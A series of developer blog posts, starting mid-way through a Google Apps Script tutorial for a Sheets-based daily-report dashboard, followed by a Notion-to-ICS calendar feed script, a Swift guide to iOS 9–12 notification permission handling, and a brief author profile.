+ if (columnIndex == 0) {
+ transformResult[rowIndex].unshift(result[columnIndex][rowIndex]);
+ } else {
+ transformResult[rowIndex].splice(1, 0, result[columnIndex][rowIndex]);
+ }
+
+ }
+ }
+
+ return transformResult;
+ }
+
+ // Convert field attributes to display objects
+ makeValues(ranges) {
+ const data = ranges.map((range) => (range != null) ? (range.getDisplayValues()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const backgroundColors = ranges.map((range) => (range != null) ? (range.getBackgrounds()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const colors = ranges.map((range) => (range != null) ? (range.getFontColorObjects()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const sizes = ranges.map((range) => (range != null) ? (range.getFontSizes()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const bolds = ranges.map((range) => (range != null) ? (range.getFontWeights()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const horizontalAlignments = ranges.map((range) => (range != null) ? (range.getHorizontalAlignments()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+ const verticalAlignments = ranges.map((range) => (range != null) ? (range.getVerticalAlignments()) : (null)).map((values) => (values != null) ? (values[0][0]) : (null));
+
+ var result = [];
+ for(const index in data) {
+ const row = data[index];
+ result.push({
+ "value": row,
+ "backgroundColor": backgroundColors[index],
+ "color": this.colorStripper(colors[index]?.asRgbColor()?.asHexString()),
+ "size": sizes[index],
+ "bold": bolds[index],
+ "horizontalAlignment": this.alignConventer(horizontalAlignments[index]),
+ "verticalAlignment": verticalAlignments[index]
+ });
+ }
+
+ return result;
+ }
+
+ colorStripper(colorString) {
+ if (colorString == undefined || colorString == null) {
+ return null
+ }
+
+ if (colorString.length == 9) {
+ return "#"+colorString.substring(3, 9);
+ } else {
+ return colorString;
+ }
+ }
+
+ alignConventer(horizontalAlignment) {
+ if (horizontalAlignment == undefined || horizontalAlignment == null) {
+ return null
+ }
+
+ return horizontalAlignment.replace('general-', '')
+ }
+
+ getFieldRow(sheet, name) {
+ const firstColumnRowsRange = sheet.getRange(1, 1, sheet.getLastRow(), 1); // Get the range of the first column (field)
+ const firstColumnRows = firstColumnRowsRange.getValues(); // Get the values of the range
+ const foundIndex = firstColumnRows.findIndex((firstColumnRow) => firstColumnRow[0] == name);
+
+ if (foundIndex < 0) {
+ return null;
+ } else {
+ return foundIndex + 1;
+ }
+ }
+}
+
Add the web request handlers to `Main.gs`:
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ cronjob();
+}
+
+function cronjob() {
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+
+ const gaData = new GAData(yesterday);
+ const inHouseReportData = fetchInHouseReportData(yesterday);
+
+ const report = new DailyReport(targetGoogleSheetID, yesterday, gaData, inHouseReportData);
+ report.execute();
+}
+
+function doGet(e) {
+ return HtmlService.createTemplateFromFile('Web_DailyReport_Scaffolding').evaluate();
+}
+
+function getDailyReportBody() {
+ const html = HtmlService.createTemplateFromFile('Web_DailyReport_Body').evaluate().getContent();
+ return html;
+}
+
+// FOR POST
+// function doPost(e) {
+// ref: https://developers.google.com/apps-script/guides/web?hl=zh-tw
+// }
+
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
Add `Web_DailyReport_Scaffolding.html` as the Web Dashboard scaffold. Since our war-room screen needs to refresh its content automatically, we create a web skeleton that periodically re-fetches the HTML content via Ajax:
<!DOCTYPE html>
+<html>
+ <head>
+ <base target="_top">
+ <script>
+ function onSuccess(html) {
+ if (html != null) {
+ var div = document.getElementById('result');
+ div.innerHTML = html;
+ }
+ }
+ setInterval(()=>{
+ google.script.run.withSuccessHandler(onSuccess).getDailyReportBody()
+ }, 1000 * 60 * 60 * 1);
+ google.script.run.withSuccessHandler(onSuccess).getDailyReportBody();
+ </script>
+ </head>
+ <body>
+ <div id="result">Loading...</div>
+ </body>
+</html>
+
Add `Web_DailyReport_Body.html`, where the actual data is rendered into HTML:
<!DOCTYPE html>
+<html>
+ <head>
+ <base target="_top">
+ <style>
+ table {
+ border-collapse: collapse;
+ width: 100%;
+ text-align: center;
+ }
+ th, td {
+ border: 1px solid #000000;
+ padding: 8px;
+ text-align: center;
+ font-size: 36px;
+ }
+ </style>
+ </head>
+ <body>
+ <h1 style="text-align:center">ZHGCHG.LI</h1>
+ <table id="dataTable">
+ <tbody>
+ <?
+ // Display data from the past 7 days
+ const dashboard = new WebDailyReport(targetGoogleSheetID, 7);
+ // Starting from yesterday
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+ const data = dashboard.allData(yesterday);
+ for(const rowIndex in data) {
+ const row = data[rowIndex];
+ ?>
+ <tr>
+ <?
+ for(const columnIndex in row) {
+ const column = row[columnIndex];
+ ?>
+ <td style="background-color: <?=column["backgroundColor"]?>; color: <?=column["color"]?>; text-align: <?=column["horizontalAlignment"]?>;">
+ <?=column["value"]?>
+ </td>
+ <?
+ }
+ ?>
+ </tr>
+ <?
+ }
+ ?>
+ </tbody>
+ </table>
+ </body>
+</html>
+
Please note that we fetch the past 7 days of data starting from yesterday for comparison; today's data is not displayed.
The project directory after completing the above steps is as follows:
Test Deployment:
Click on the top right corner of the project “Deploy” -> “Test Deployment”
If stuck on Loading… or a server error occurs, you can go back to the “Executions” tab in the editor to check the error message:
Complete Final Deployment:
If the test is fine, you can complete the final deployment and release the URL.
Click on the top right corner of the project “Deploy” -> “New Deployment” -> Top left corner “Select type” -> “Web app”:
Code changes require redeployment to take effect:
Please note that whenever the code changes, you need to redeploy (the URL stays the same) for the changes to take effect; otherwise the old version will keep being served.
Click on the top right corner of the project “Deploy” -> “Manage deployments”:
Click on the top right corner “Pen 🖊️ ICON” -> “Version” -> “Create new version” -> “Deploy”.
After deployment, click the URL, or go back to the original URL and refresh to see the new changes.
Final result:
(I modified the program to backfill this month’s data; otherwise the new sheet would contain only a single entry for yesterday.)
I previously implemented a Notion-to-Calendar feature.
The approach: call the Notion API to fetch database entries, render them into an ICS-format page, and deploy it as a public web endpoint; that URL can then be subscribed to from Apple Calendar.
Main.gs:
// Constant variables
+const notionToken = "XXXXX";
+const safeToken = "XXXXX";
+
+function doGet(e) {
+ const ics = HtmlService.createTemplateFromFile('ics');
+
+ if (e.parameter.token != safeToken) {
+ return ContentService.createTextOutput("Access Denied!");
+ }
+
+ ics.events = getQuickNote();
+
+ return ContentService.createTextOutput(ics.evaluate().getContent()).setMimeType(ContentService.MimeType.ICAL);
+}
+
+function debug() {
+ const ics = HtmlService.createTemplateFromFile('ics');
+ ics.events = getQuickNote();
+ Logger.log(ics.evaluate().getContent());
+}
+
+function getQuickNote() {
+ // YOUR FILTER Condition:
+ const payload = {
+ "filter": {
+ "and": [
+ {
+ "property": "Date",
+ "date": {
+ "is_not_empty": true
+ }
+ }
+ ,
+ {
+ "property": "Name",
+ "title": {
+ "is_not_empty": true
+ }
+ }
+ ]
+ }
+ };
+ const result = getDatabase(YOUR_DATABASE_ID, payload);
+ var events = [];
+ for (const index in result.results) {
+ const item = result.results[index]
+ const properties = item.properties;
+
+ const id = item['id'];
+ const create = toICSDate(item["created_time"]);
+ const edit = toICSDate(item["last_edited_time"]);
+ const startDate = properties['Date']['date']['start'];
+ const start = toICSDate(startDate);
+ var endDate = properties['Date']?.['date']?.['end'];
+ if (endDate == null) {
+ endDate = startDate;
+ }
+ const end = toICSDate(endDate);
+ const type = properties['Type']?.['multi_select']?.[0]?.['name'];
+
+ const title = "["+type+"] "+properties?.['Name']?.['title']?.[0]?.['plain_text'];
+ const description = item['url'];
+
+ events.push(
+ {
+ "id":id,
+ "create":create,
+ "edit":edit,
+ "start":start,
+ "end":end,
+ "title":title,
+ "description":description
+ }
+ )
+ }
+ return events;
+}
+// Convert to an ICS UTC date string.
+// Trick: shift the time back 8 hours, then format it in GMT+8; the printed components
+// therefore represent UTC, and the literal 'Z' suffix marks the value as UTC.
+function toICSDate(date) {
+ const icsDate = new Date(date);
+ icsDate.setHours(icsDate.getHours() - 8);
+ return Utilities.formatDate(icsDate, "GMT+8", "yyyyMMdd'T'HHmmss'Z'"); // e.g. 20240304T132300Z
+}
+
+// Notion
+function getDatabase(id, payload) {
+ const url = 'https://api.notion.com/v1/databases/'+id+'/query/';
+ const options = {
+ method: 'post',
+ headers: {
+ 'Authorization': 'Bearer '+notionToken,
+ 'Content-Type': 'application/json',
+ 'Notion-Version': '2022-06-28'
+ },
+ payload: JSON.stringify(payload)
+ };
+ const result = UrlFetchApp.fetch(url, options);
+ return JSON.parse(result.getContentText());
+}
+
ics.html:
BEGIN:VCALENDAR
+PRODID:-//Google Inc//Google Calendar 70.9054//EN
+VERSION:2.0
+CALSCALE:GREGORIAN
+METHOD:PUBLISH
+X-WR-CALNAME:NotionCalendar
+X-WR-TIMEZONE:Asia/Taipei
+BEGIN:VTIMEZONE
+TZID:Asia/Taipei
+X-LIC-LOCATION:Asia/Taipei
+BEGIN:STANDARD
+TZOFFSETFROM:+0800
+TZOFFSETTO:+0800
+TZNAME:CST
+DTSTART:19700101T000000
+END:STANDARD
+END:VTIMEZONE
+<?
+ for(const eventIndex in events) {
+ const event = events[eventIndex];
+ ?>
+BEGIN:VEVENT
+DTSTART:<?=event["start"]?>
+
+DTEND:<?=event["end"]?>
+
+DTSTAMP:<?=event["edit"]?>
+
+UID:<?=event["id"]?>
+
+CREATED:<?=event["create"]?>
+
+LAST-MODIFIED:<?=event["edit"]?>
+
+SEQUENCE:0
+STATUS:CONFIRMED
+SUMMARY:<?=event["title"]?>
+
+DESCRIPTION:<?=event["description"]?>
+
+TRANSP:OPAQUE
+END:VEVENT
+<?
+ }
+?>
+END:VCALENDAR
+
As mentioned earlier, deploy it as a web app: click “Deploy” in the top right corner of the project -> “New Deployment” -> “Select type” in the top left -> “Web app”:
Add the URL to the calendar subscription, and it’s done 🎉🎉🎉🎉 !
If you or your team have automation or process-integration needs, whether it’s Slack app development, Notion, Asana, Google Sheets, Google Forms, GA data, or other integrations, feel free to contact me for development work.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Solution for handling notification permission status and requesting permissions from iOS 9 to iOS 12
Following the previous article “What? iOS 12 can send push notifications without user authorization (Swift)”, which covered optimizing the push notification permission flow, new requirements came in after that optimization:
Items 1 to 3 are straightforward; the UserNotifications framework available from iOS 10 handles them well. The troublesome part is item 4, which also has to support iOS 9, where we must fall back to the old registerUserNotificationSettings API. Let’s work through it step by step!
First, declare a global notificationStatus object to store the notification permission status, and add property observation on the pages that need to react to it (here I use an Observable wrapper to subscribe to value changes; you could equally use KVO or a reactive library such as RxSwift or ReactiveCocoa. A minimal sketch of such a wrapper follows the declaration below).
In the AppDelegate, check the push notification permission status and update notificationStatus in didFinishLaunchingWithOptions (when the app first launches), applicationDidBecomeActive (when returning from the background), and didRegisterUserNotificationSettings (the ≤ iOS 9 permission-prompt callback).
The observing pages are then notified and can react accordingly (e.g., show a “notifications are turned off” prompt).
enum NotificationStatusType {
+ case authorized
+ case denied
+ case notDetermined
+}
+var notificationStatus: Observable<NotificationStatusType?> = Observable(nil)
+
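The Observable wrapper used for notificationStatus is not shown in this article. For reference, here is a minimal sketch of what such a wrapper could look like, assuming the afterChange += { old, new in ... } listener style used further down (this is an assumption for illustration; the real project may use an existing library such as Observable-Swift instead):

// Minimal, append-only Observable sketch (illustrative assumption, not the project's actual type).
class Observable<T> {
    // Listeners are called with (oldValue, newValue) after every assignment to `value`.
    var afterChange: [(T, T) -> Void] = []

    var value: T {
        didSet {
            afterChange.forEach { $0(oldValue, value) }
        }
    }

    init(_ value: T) {
        self.value = value
    }
}

// Lets call sites write `notificationStatus.afterChange += { old, new in ... }`.
func += <T>(listeners: inout [(T, T) -> Void], listener: @escaping (T, T) -> Void) {
    listeners.append(listener)
}

With this sketch, Observable(nil) above infers T as NotificationStatusType?, and every assignment to notificationStatus.value notifies all registered listeners.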
notificationStatus has four possible states: nil (not yet checked), .authorized (allowed), .denied (not allowed), and .notDetermined (never asked). It is populated as follows:
func checkNotificationPermissionStatus() {
+ if #available(iOS 10.0, *) {
+ UNUserNotificationCenter.current().getNotificationSettings { (settings) in
+ DispatchQueue.main.async {
+ // Note! Switch back to the main thread
+ if settings.authorizationStatus == .authorized {
+ // Allowed
+ notificationStatus.value = NotificationStatusType.authorized
+ } else if settings.authorizationStatus == .denied {
+ // Not allowed
+ notificationStatus.value = NotificationStatusType.denied
+ } else {
+ // Not asked
+ notificationStatus.value = NotificationStatusType.notDetermined
+ }
+ }
+ }
+ } else {
+ if UIApplication.shared.currentUserNotificationSettings?.types == [] {
+ if let iOS9NotificationIsDetermined = UserDefaults.standard.object(forKey: "iOS9NotificationIsDetermined") as? Bool, iOS9NotificationIsDetermined == true {
+ // Already asked, but no notification types granted -> not allowed
+ notificationStatus.value = NotificationStatusType.denied
+ } else {
+ // Never asked yet
+ notificationStatus.value = NotificationStatusType.notDetermined
+ }
+ } else {
+ // Allowed
+ notificationStatus.value = NotificationStatusType.authorized
+ }
+ }
+}
+
That’s not all! Sharp-eyed friends should have noticed the custom UserDefaults “iOS9NotificationIsDetermined” in the ≤ iOS 9 judgment. What is it used for?
The main reason is that on ≤ iOS 9 the only way to detect push permission is to inspect the current notification settings: an empty value means no permission, but it is also empty when the user has never been asked. That is troublesome, because we cannot tell whether the user was never asked or explicitly denied the permission.
Here, I use a custom UserDefaults “iOS9NotificationIsDetermined” as a judgment switch and add it in the appDelegate’s didRegisterUserNotificationSettings:
//appdelegate.swift:
+func application(_ application: UIApplication, didRegister notificationSettings: UIUserNotificationSettings) {
+ // For iOS 9 and below, this method is triggered after the permission prompt is shown and the user either allows or denies the notification.
+  UserDefaults.standard.set(true, forKey: "iOS9NotificationIsDetermined")
+ checkNotificationPermissionStatus()
+}
+
After constructing the object and method for checking notification permission status, we need to add the following in appDelegate…
//appdelegate.swift
+func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {
+ checkNotificationPermissionStatus()
+ return true
+}
+func applicationDidBecomeActive(_ application: UIApplication) {
+ checkNotificationPermissionStatus()
+}
+
The app needs to check the push notification status both at launch and when returning from the background.
This covers the detection part. Next, let’s see how to handle the request for notification permissions if it has not been asked.
func requestNotificationPermission() {
+ if #available(iOS 10.0, *) {
+ let permissions: UNAuthorizationOptions = [.badge, .alert, .sound]
+ UNUserNotificationCenter.current().requestAuthorization(options: permissions) { (granted, error) in
+ DispatchQueue.main.async {
+ checkNotificationPermissionStatus()
+ }
+ }
+ } else {
+    UIApplication.shared.registerUserNotificationSettings(UIUserNotificationSettings(types: [.alert, .badge, .sound], categories: nil))
+ // The didRegisterUserNotificationSettings in appdelegate.swift will handle the subsequent callback
+ }
+}
+
After handling detection and requests, let’s see how to apply it.
if notificationStatus.value == NotificationStatusType.authorized {
+ // OK!
+} else if notificationStatus.value == NotificationStatusType.denied {
+ // Not allowed
+ // This example shows a UIAlertController prompt and redirects to the settings page upon clicking
+ let alertController = UIAlertController(
+ title: "Dear, you are currently unable to receive notifications",
+ message: "Please enable notification permissions for the app.",
+ preferredStyle: .alert)
+ let settingAction = UIAlertAction(
+ title: "Go to Settings",
+ style: .destructive,
+ handler: {
+ (action: UIAlertAction!) -> Void in
+ if let bundleID = Bundle.main.bundleIdentifier, let url = URL(string: UIApplicationOpenSettingsURLString + bundleID) {
+ UIApplication.shared.openURL(url)
+ }
+ })
+ let okAction = UIAlertAction(
+ title: "Cancel",
+ style: .default,
+ handler: {
+ (action: UIAlertAction!) -> Void in
+ // well....
+ })
+ alertController.addAction(okAction)
+ alertController.addAction(settingAction)
+ self.present(alertController, animated: true) {
+
+ }
+} else if notificationStatus.value == NotificationStatusType.notDetermined {
+ // Not asked
+ requestNotificationPermission()
+}
+
Note!! When jumping to the app’s page in “Settings”, do not use
UIApplication.shared.openURL(URL(string: "App-Prefs:root=\(bundleID)")!)
to do the jump. It will be rejected! It will be rejected! It will be rejected! (personal experience)
App-Prefs is a private URL scheme (private API).
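For completeness, here is a small sketch of an App Review-safe way to open the app’s own Settings page using only public API, mirroring the settingAction in the example above (the function name openAppSettings is just for illustration; UIApplicationOpenSettingsURLString is the Swift 4-era spelling used in this article, renamed UIApplication.openSettingsURLString in later SDKs):

import UIKit

// Opens this app's own page in Settings via the public constant only (no private URL schemes).
func openAppSettings() {
    guard let url = URL(string: UIApplicationOpenSettingsURLString),
          UIApplication.shared.canOpenURL(url) else { return }
    if #available(iOS 10.0, *) {
        UIApplication.shared.open(url, options: [:], completionHandler: nil)
    } else {
        UIApplication.shared.openURL(url)
    }
}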
To react to status changes dynamically, since notificationStatus is an Observable, we can add a listener in viewDidLoad on any page that needs to monitor the status in real time:
override func viewDidLoad() {
+ super.viewDidLoad()
+ notificationStatus.afterChange += { oldStatus,newStatus in
+ if newStatus == NotificationStatusType.authorized {
+ //print("❤️Thank you for enabling notifications")
+ } else if newStatus == NotificationStatusType.denied {
+ //print("😭Oh no")
+ }
+ }
+}
+
The above is just sample code. You can adjust the actual application and triggers as needed.
*When using Observable for notificationStatus, pay attention to memory management: release listeners when they are no longer needed (to prevent memory leaks), and keep them alive while you still need the callbacks (otherwise the listener silently stops firing). See the sketch after these notes.
*Since our project supports iOS 9 to iOS 12, iOS 8 has not been tested and the support level is uncertain.
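One possible way to get that lifetime management automatically is a token-based observable, sketched below. This is not the article’s actual Observable type; the names SubscriptionToken, ObservableValue, and StatusViewController are hypothetical and for illustration only.

import UIKit

// The subscription lives exactly as long as the returned token is retained.
final class SubscriptionToken {
    private let cancel: () -> Void
    init(cancel: @escaping () -> Void) { self.cancel = cancel }
    deinit { cancel() }
}

final class ObservableValue<T> {
    private var listeners: [UUID: (T) -> Void] = [:]
    var value: T {
        didSet { listeners.values.forEach { $0(value) } }
    }
    init(_ value: T) { self.value = value }

    // Registers a listener and returns a token; dropping the token removes the listener.
    func observe(_ listener: @escaping (T) -> Void) -> SubscriptionToken {
        let id = UUID()
        listeners[id] = listener
        return SubscriptionToken { [weak self] in self?.listeners[id] = nil }
    }
}

final class StatusViewController: UIViewController {
    private let isAuthorized = ObservableValue<Bool>(false) // hypothetical example value
    private var token: SubscriptionToken?

    override func viewDidLoad() {
        super.viewDidLoad()
        // Stored as a property: the listener stays alive while this screen exists
        // and is removed automatically when the screen is deallocated.
        token = isAuthorized.observe { [weak self] authorized in
            self?.view.backgroundColor = authorized ? .green : .red
        }
    }
}

Because the token is held as a property, the listener is removed when the view controller deallocates, which covers both the leak case and the “listener stopped firing” case mentioned in the note above.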
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
1994, ♋️
From Changhua, Lives in Taipei / Taiwan 🇹🇼
One day you’ll leave this world behind, so live a life you will remember.
Travel, Biking, Running, Swimming, Hiking
ToDo: 2022 Taipei Grand Trail
ToDo: 2022 Free Diving
Bar, Izakaya
My Favorite Music Genres:
My Favorite Musician:
My Western Music Collection